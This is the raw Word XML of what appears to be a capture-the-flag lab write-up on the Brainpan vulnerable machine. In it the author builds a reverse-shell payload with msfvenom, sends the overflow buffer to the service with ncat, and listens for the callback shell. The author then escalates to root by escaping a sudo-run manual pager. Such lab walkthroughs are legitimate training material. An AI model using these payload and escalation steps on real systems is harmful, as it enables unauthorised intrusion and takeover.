      <w:r w:rsidRPr="00850B04">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>cat payload.txt chars.txt | ncat 127.0.0.1 9999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429D681A" w14:textId="3C5F045C" w:rsidR="00850B04" w:rsidRDefault="00ED1F5D" w:rsidP="00FE0F82">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>In winedgb, type info stack 32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24371BE9" w14:textId="638F7B80" w:rsidR="00ED1F5D" w:rsidRDefault="00ED1F5D" w:rsidP="00FE0F82">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1281D7F0" wp14:editId="1A45BE06">
            <wp:extent cx="5181600" cy="3238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DDE" w14:textId="7D153736" w:rsidR="00850B04" w:rsidRDefault="00850B04" w:rsidP="00850B04">
      <w:pPr>
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="009C24B8">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>ine brainpan.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F65151" w14:textId="77777777" w:rsidR="00850B04" w:rsidRDefault="00850B04" w:rsidP="00850B04">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00850B04">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>cat payload.txt chars.txt | ncat 127.0.0.1 9999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F401D0" w14:textId="0880D887" w:rsidR="00850B04" w:rsidRDefault="00ED1F5D" w:rsidP="00850B04">
      <w:pPr>
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51FF6BEA" wp14:editId="3C7316D9">
            <wp:extent cx="5943600" cy="27006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AE3B" w14:textId="60638A7B" w:rsidR="00850B04" w:rsidRDefault="00AC7BFB" w:rsidP="00850B04">
      <w:r w:rsidRPr="00AC7BFB">
        <w:t>Sequence appears to be successful</w:t>
      </w:r>
      <w:r>
        <w:t>. Now it is time to create a payload with msfvenom. I know it’s a windows exe, so I use the windows shell reverse tcp. I also added space to the beginning of the payload using a NOP sled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C7A68F" w14:textId="561F112B" w:rsidR="00AC7BFB" w:rsidRDefault="00AC7BFB" w:rsidP="00850B04">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC7BFB">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>msfvenom -p windows/shell_reverse_tcp LHOST=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7BFB">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> LPORT=8080 EXITFUNC=thread -f raw -b "\x00\x09\x0d\x0a\x20\xff" -n 32 &gt; attack.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E29144" w14:textId="75E81E63" w:rsidR="00C90F1C" w:rsidRDefault="00C90F1C" w:rsidP="00850B04">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BD81A32" wp14:editId="664A656F">
            <wp:extent cx="5943600" cy="1651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76E4" w14:textId="77777777" w:rsidR="00C90F1C" w:rsidRDefault="00C90F1C" w:rsidP="00C90F1C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="009C24B8">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>ine brainpan.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF1ED4E" w14:textId="77777777" w:rsidR="00C90F1C" w:rsidRDefault="00C90F1C" w:rsidP="00850B04">
      <w:r w:rsidRPr="00C90F1C">
        <w:t xml:space="preserve">In a third terminal: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4118C222" w14:textId="172476E5" w:rsidR="00C90F1C" w:rsidRDefault="00C90F1C" w:rsidP="00850B04">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C90F1C">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ncat -nl 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB9C0C0" w14:textId="77777777" w:rsidR="00C90F1C" w:rsidRDefault="00C90F1C" w:rsidP="00850B04">
      <w:r w:rsidRPr="00C90F1C">
        <w:t xml:space="preserve">In terminal that msfvenom was ran I piped payload and attack to ncat: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5AF377" w14:textId="36686A10" w:rsidR="00C90F1C" w:rsidRPr="00AC7BFB" w:rsidRDefault="00C90F1C" w:rsidP="00850B04">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C90F1C">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>cat payload.txt attack.txt | ncat 127.0.0.1 9999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C83AF83" w14:textId="0C8D8BA6" w:rsidR="00AC7BFB" w:rsidRDefault="00414418" w:rsidP="00850B04">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="696F2B6D" wp14:editId="641B7612">
            <wp:extent cx="5943600" cy="24593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237E" w14:textId="7F576639" w:rsidR="00414418" w:rsidRPr="00414418" w:rsidRDefault="00414418" w:rsidP="00850B04">
      <w:r>
        <w:t xml:space="preserve">Ran id and dir confirming that the exe let me in. However, this is just my kali. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025A3187" w14:textId="55136F4C" w:rsidR="00414418" w:rsidRDefault="00414418" w:rsidP="00850B04">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65A187D4" wp14:editId="2FF8CD9E">
            <wp:extent cx="5943600" cy="2674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57C8" w14:textId="34D67C29" w:rsidR="00AC7BFB" w:rsidRDefault="00414418" w:rsidP="00850B04">
      <w:r>
        <w:t>I remake the msfvenom</w:t>
      </w:r>
      <w:r w:rsidR="0096736D">
        <w:t xml:space="preserve"> my kali $IP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0096736D">
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0096736D">
        <w:t>ncat to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the brainpan $IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23660FFB" w14:textId="34F45DC6" w:rsidR="0096736D" w:rsidRDefault="00A85E2D" w:rsidP="00850B04">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="100024E0" wp14:editId="5A3EC40F">
            <wp:extent cx="5943600" cy="16325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51B" w14:textId="38B21529" w:rsidR="00A85E2D" w:rsidRDefault="00A85E2D" w:rsidP="00850B04">
      <w:r>
        <w:t>Success, I am PUCK.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E292A0" w14:textId="31810D95" w:rsidR="00A85E2D" w:rsidRDefault="00A85E2D" w:rsidP="00850B04">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DDA678E" wp14:editId="2D8816EF">
            <wp:extent cx="5943600" cy="26809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E133" w14:textId="77F627F5" w:rsidR="00BC471C" w:rsidRDefault="00BC471C" w:rsidP="00850B04">
      <w:r>
        <w:t>Ran dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3967DB2A" w14:textId="6217F9B8" w:rsidR="00BC471C" w:rsidRDefault="00BC471C" w:rsidP="00850B04">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E40C300" wp14:editId="35859E55">
            <wp:extent cx="4552950" cy="2266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5B0" w14:textId="0F5A5AC9" w:rsidR="00BC471C" w:rsidRDefault="00BC471C" w:rsidP="00850B04">
      <w:r>
        <w:t>Hmm, cannot open the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185977C3" w14:textId="2023F6C6" w:rsidR="00BC471C" w:rsidRDefault="00BC471C" w:rsidP="00850B04">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="403EA5DE" wp14:editId="3E6E14E2">
            <wp:extent cx="3486150" cy="1171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85F8" w14:textId="337BA7F0" w:rsidR="00850B04" w:rsidRDefault="00E835FE" w:rsidP="00FE0F82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3639A749" wp14:editId="5CD35BF5">
            <wp:extent cx="4429125" cy="2771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652D" w14:textId="2422B399" w:rsidR="00E835FE" w:rsidRDefault="00E835FE" w:rsidP="00FE0F82">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CFB6F18" wp14:editId="44E1C3D6">
            <wp:extent cx="1924050" cy="1209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9AA" w14:textId="547A6390" w:rsidR="00E835FE" w:rsidRDefault="00F8366A" w:rsidP="00FE0F82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58C827AE" wp14:editId="11A72670">
            <wp:extent cx="4610100" cy="5476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7316" w14:textId="652C9D97" w:rsidR="00F8366A" w:rsidRDefault="00F8366A" w:rsidP="00FE0F82">
      <w:r w:rsidRPr="00F8366A">
        <w:t>Looks like Linux but we can use windows commands</w:t>
      </w:r>
      <w:r>
        <w:t>. Can I open bash?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA69034" w14:textId="09C80A79" w:rsidR="00F8366A" w:rsidRDefault="00F8366A" w:rsidP="00FE0F82">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7686F46D" wp14:editId="325BE0B3">
            <wp:extent cx="1762125" cy="20097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675" w14:textId="178F5EC4" w:rsidR="00F8366A" w:rsidRDefault="00F8366A" w:rsidP="00FE0F82">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Interestingly, all I typed was cd bin. The ls and bash ran on their own.</w:t>
      </w:r>
      <w:r w:rsidR="003C51EE">
        <w:t xml:space="preserve"> Exploring a bit more I see nc is installed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72334AF5" w14:textId="28BD2726" w:rsidR="003C51EE" w:rsidRDefault="003C51EE" w:rsidP="00FE0F82">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14D5EB88" wp14:editId="6DB980EB">
            <wp:extent cx="1438275" cy="1333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3C2" w14:textId="15737DFD" w:rsidR="00B11962" w:rsidRDefault="00B11962" w:rsidP="00FE0F82">
      <w:r>
        <w:t>Ok, so it’s the wrong version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A785C4C" w14:textId="0AB51B38" w:rsidR="003C51EE" w:rsidRDefault="00B11962" w:rsidP="00FE0F82">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71CA7FFA" wp14:editId="37789A1D">
            <wp:extent cx="5943600" cy="843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F1AF" w14:textId="4E7DC2A7" w:rsidR="00B11962" w:rsidRDefault="00B11962" w:rsidP="00FE0F82">
      <w:r>
        <w:t>Using the cheatsheet for wrong versions, it is possible to get nc to run in the right version (</w:t>
      </w:r>
      <w:hyperlink r:id="rId41" w:history="1">
        <w:r w:rsidRPr="004D5C1C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://web.archive.org/web/20190507124124/http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FD478F" w14:textId="795294F4" w:rsidR="00B11962" w:rsidRDefault="001C488D" w:rsidP="00FE0F82">
      <w:r>
        <w:t>Open a 4</w:t>
      </w:r>
      <w:r w:rsidRPr="001C488D">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> terminal window:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70295C55" w14:textId="229F35E9" w:rsidR="001C488D" w:rsidRPr="001C488D" w:rsidRDefault="001C488D" w:rsidP="00FE0F82">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C488D">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ncat -nl 8888</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E3EC15" w14:textId="6B667976" w:rsidR="001C488D" w:rsidRDefault="001C488D" w:rsidP="00FE0F82">
      <w:r>
        <w:t>In puck, type the command to run nc in the correct version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554EA32B" w14:textId="65D5A3E0" w:rsidR="001C488D" w:rsidRDefault="001C488D" w:rsidP="00FE0F82">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55B07435" wp14:editId="0974EDDB">
            <wp:extent cx="5943600" cy="1127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6DA" w14:textId="01F5780A" w:rsidR="001C488D" w:rsidRDefault="001C488D" w:rsidP="00FE0F82">
      <w:r>
        <w:t>I run sudo -i and sudo -l to know what the user can do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AABF058" w14:textId="101A94F3" w:rsidR="00F8366A" w:rsidRDefault="001C488D" w:rsidP="00FE0F82">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3518DB37" wp14:editId="0A44E53A">
            <wp:extent cx="5943600" cy="1897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EE90" w14:textId="271CD40B" w:rsidR="001C488D" w:rsidRDefault="001C488D" w:rsidP="00FE0F82">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Since the command says root, I run it with sudo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FF5E99" w14:textId="526FD992" w:rsidR="001C488D" w:rsidRDefault="00A73A96" w:rsidP="00FE0F82">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="344AF688" wp14:editId="3AE0858A">
            <wp:extent cx="4905375" cy="12668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9919" w14:textId="27EF6033" w:rsidR="00A73A96" w:rsidRDefault="00A73A96" w:rsidP="00FE0F82">
      <w:r>
        <w:t>Manual usually displays with the less command and often accepts other commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1590648F" w14:textId="405EF915" w:rsidR="00F8366A" w:rsidRPr="00A73A96" w:rsidRDefault="00A73A96" w:rsidP="00FE0F82">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A73A96">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo /home/anansi/bin/anansi_util manual </w:t>
      </w:r>
      <w:r w:rsidRPr="00A73A96">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16867C7D" w14:textId="1D5AAF3A" w:rsidR="00A73A96" w:rsidRDefault="00A73A96" w:rsidP="00FE0F82">
      <w:r>
        <w:t>I have to scroll and its not using returns.  This is because its not a tty.</w:t>
      </w:r>
      <w:r w:rsidR="00785B52">
        <w:t xml:space="preserve"> I used python to spawn one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B010E53" w14:textId="1C8EF138" w:rsidR="00785B52" w:rsidRDefault="00785B52" w:rsidP="00FE0F82">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BDF8E74" wp14:editId="57135ACB">
            <wp:extent cx="5943600" cy="9931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C3F" w14:textId="77777777" w:rsidR="00785B52" w:rsidRPr="00A73A96" w:rsidRDefault="00785B52" w:rsidP="00785B52">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A73A96">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>sudo /home/anansi/bin/anansi_util manual nc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C8B228" w14:textId="0B89FB8E" w:rsidR="00785B52" w:rsidRDefault="006D6156" w:rsidP="00FE0F82">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58219492" wp14:editId="1B4D9CED">
            <wp:extent cx="4819650" cy="1038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26B1" w14:textId="03A7885E" w:rsidR="006D6156" w:rsidRDefault="006D6156" w:rsidP="00FE0F82">
      <w:r>
        <w:t>Instead of letting it use LESS, I entered my own command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A50FF2" w14:textId="1EC70F48" w:rsidR="006D6156" w:rsidRDefault="006D6156" w:rsidP="00FE0F82">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D121702" wp14:editId="3A09A336">
            <wp:extent cx="3333750" cy="72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0DA1" w14:textId="59263E5F" w:rsidR="006D6156" w:rsidRDefault="006D6156" w:rsidP="00FE0F82">
      <w:r>
        <w:t>I’m root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B339E86" w14:textId="2497EB34" w:rsidR="006D6156" w:rsidRDefault="006D6156" w:rsidP="00FE0F82">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6063493C" wp14:editId="5BFD6EFE">
            <wp:extent cx="4257675" cy="762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710" w14:textId="229AE260" w:rsidR="006D6156" w:rsidRDefault="006D6156" w:rsidP="00FE0F82">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F331A88" wp14:editId="359B51B8">
            <wp:extent cx="5943600" cy="45777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13F" w14:textId="237399CA" w:rsidR="006D6156" w:rsidRDefault="006D6156" w:rsidP="00FE0F82">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F9210A4" wp14:editId="11953088">
            <wp:extent cx="516255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FB2" w14:textId="4E2852D0" w:rsidR="006D6156" w:rsidRDefault="006D6156" w:rsidP="00FE0F82">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="090DAA6D" wp14:editId="6C4FD842">
            <wp:extent cx="5267325" cy="2209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D2B2" w14:textId="0209FFF5" w:rsidR="006D6156" w:rsidRDefault="006D6156" w:rsidP="00FE0F82">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C74FCD9" wp14:editId="2DC53834">
            <wp:extent cx="5943600" cy="19748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FE0B" w14:textId="7C057CA9" w:rsidR="006D6156" w:rsidRDefault="006D6156" w:rsidP="00FE0F82">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="798C504F" wp14:editId="176C046E">
            <wp:extent cx="5943600" cy="43472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173" w14:textId="77777777" w:rsidR="00F8366A" w:rsidRPr="00F8366A" w:rsidRDefault="00F8366A" w:rsidP="00FE0F82"/>
    <w:p w14:paraId="2A1897E6" w14:textId="77777777" w:rsidR="00ED0A41" w:rsidRDefault="00ED0A41" w:rsidP="00846C39"/>
    <w:p w14:paraId="3FEF8C61" w14:textId="77777777" w:rsidR="00754AE8" w:rsidRPr="00E363D1" w:rsidRDefault="00754AE8" w:rsidP="00846C39">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="560C72A2" w14:textId="77777777" w:rsidR="009A6378" w:rsidRPr="009A6378" w:rsidRDefault="009A6378" w:rsidP="00846C39"/>
    <w:p w14:paraId="329DFF4C" w14:textId="77777777" w:rsidR="009A6378" w:rsidRPr="0011445D" w:rsidRDefault="009A6378" w:rsidP="00846C39">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="009A6378" w:rsidRPr="00114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D5F26"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F466AEAC"/>
    <w:lvl w:ilvl="0" w:tplc="5B7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41"/>
    <w:rsid w:val="00024C8E"/>
    <w:rsid w:val="00026D74"/>
    <w:rsid w:val="00063B24"/>
    <w:rsid w:val="00073423"/>
    <w:rsid w:val="00074FEE"/>
    <w:rsid w:val="000A090B"/>
    <w:rsid w:val="000A1ED0"/>
    <w:rsid w:val="0011445D"/>
    <w:rsid w:val="001211D9"/>
    <w:rsid w:val="001343B6"/>
    <w:rsid w:val="00163F5C"/>
    <w:rsid w:val="001C488D"/>
    <w:rsid w:val="0022606D"/>
    <w:rsid w:val="00232FF6"/>
    <w:rsid w:val="00246F39"/>
    <w:rsid w:val="0029167B"/>
    <w:rsid w:val="002B5503"/>
    <w:rsid w:val="002D7ECD"/>
    <w:rsid w:val="003577F8"/>
    <w:rsid w:val="003C51EE"/>
    <w:rsid w:val="003E77C2"/>
    <w:rsid w:val="00414418"/>
    <w:rsid w:val="004337BB"/>
    <w:rsid w:val="00471121"/>
    <w:rsid w:val="00480624"/>
    <w:rsid w:val="004A27E0"/>
    <w:rsid w:val="004B372E"/>
    <w:rsid w:val="004C3F03"/>
    <w:rsid w:val="0055612C"/>
    <w:rsid w:val="005734B0"/>
    <w:rsid w:val="005744B6"/>
    <w:rsid w:val="005868F7"/>
    <w:rsid w:val="005A1501"/>
    <w:rsid w:val="005D1C47"/>
    <w:rsid w:val="00603909"/>
    <w:rsid w:val="006311DE"/>
    <w:rsid w:val="00643292"/>
    <w:rsid w:val="0067550C"/>
    <w:rsid w:val="00680D7C"/>
    <w:rsid w:val="00684364"/>
    <w:rsid w:val="00697851"/>
    <w:rsid w:val="006A2FA2"/>
    <w:rsid w:val="006D6156"/>
    <w:rsid w:val="0074393E"/>
    <w:rsid w:val="00744E71"/>
    <w:rsid w:val="00754AE8"/>
    <w:rsid w:val="00761637"/>
    <w:rsid w:val="0078179A"/>
    <w:rsid w:val="00785B52"/>
    <w:rsid w:val="007C44A0"/>
    <w:rsid w:val="007F702D"/>
    <w:rsid w:val="0083499C"/>
    <w:rsid w:val="00846C39"/>
    <w:rsid w:val="00850B04"/>
    <w:rsid w:val="008726EF"/>
    <w:rsid w:val="00883820"/>
    <w:rsid w:val="008F04BE"/>
    <w:rsid w:val="009164BA"/>
    <w:rsid w:val="00925F18"/>
    <w:rsid w:val="0096736D"/>
    <w:rsid w:val="00995A85"/>
    <w:rsid w:val="009A6378"/>
    <w:rsid w:val="009B0DAE"/>
    <w:rsid w:val="009C24B8"/>
    <w:rsid w:val="009D64DD"/>
    <w:rsid w:val="009E3E72"/>
    <w:rsid w:val="009F1AB8"/>
    <w:rsid w:val="00A04919"/>
    <w:rsid w:val="00A22663"/>
    <w:rsid w:val="00A64941"/>
    <w:rsid w:val="00A73A96"/>
    <w:rsid w:val="00A85E2D"/>
    <w:rsid w:val="00A86F50"/>
    <w:rsid w:val="00A87BA0"/>
    <w:rsid w:val="00AC1CD5"/>
    <w:rsid w:val="00AC7BFB"/>
    <w:rsid w:val="00AD2CFB"/>
    <w:rsid w:val="00B11962"/>
    <w:rsid w:val="00B447CE"/>
    <w:rsid w:val="00B5475A"/>
    <w:rsid w:val="00B67F7B"/>
    <w:rsid w:val="00B8715F"/>
    <w:rsid w:val="00BC471C"/>
    <w:rsid w:val="00BE363C"/>
    <w:rsid w:val="00BE42AB"/>
    <w:rsid w:val="00C44756"/>
    <w:rsid w:val="00C90F1C"/>
    <w:rsid w:val="00CD2439"/>
    <w:rsid w:val="00CF59EB"/>
    <w:rsid w:val="00D14513"/>
    <w:rsid w:val="00D22AB0"/>
    <w:rsid w:val="00D23EEE"/>
    <w:rsid w:val="00D40238"/>
    <w:rsid w:val="00D6397E"/>
    <w:rsid w:val="00D733EC"/>
    <w:rsid w:val="00D85FF8"/>
    <w:rsid w:val="00DA603E"/>
    <w:rsid w:val="00DB7CC5"/>
    <w:rsid w:val="00E30BC1"/>
    <w:rsid w:val="00E363D1"/>
    <w:rsid w:val="00E835FE"/>
    <w:rsid w:val="00E85943"/>
    <w:rsid w:val="00E96D43"/>
    <w:rsid w:val="00EA7D41"/>
    <w:rsid w:val="00EB2C36"/>
    <w:rsid w:val="00EC6FD0"/>
    <w:rsid w:val="00ED0A41"/>
    <w:rsid w:val="00ED1F5D"/>
    <w:rsid w:val="00F021FE"/>
    <w:rsid w:val="00F21EFB"/>
    <w:rsid w:val="00F261D2"/>
    <w:rsid w:val="00F31BAC"/>
    <w:rsid w:val="00F82A05"/>
    <w:rsid w:val="00F8366A"/>
    <w:rsid w:val="00FE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8C838"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{064E28BF-1DCA-4E17-8028-CF3132041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B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2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6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491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2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21F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21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hyperlink" Target="http://192.168.56.107:10000/bin/brainpan.exe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web.archive.org/web/20190507124124/http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet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dn.comparitech.com/wp-content/uploads/2019/06/Nmap-Cheat-Sheet.pdf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22</Pages>
  <Words>1045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gilbertson</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>IT Support</cp:lastModifiedBy>
  <cp:revision>167</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-24T01:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-24T18:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>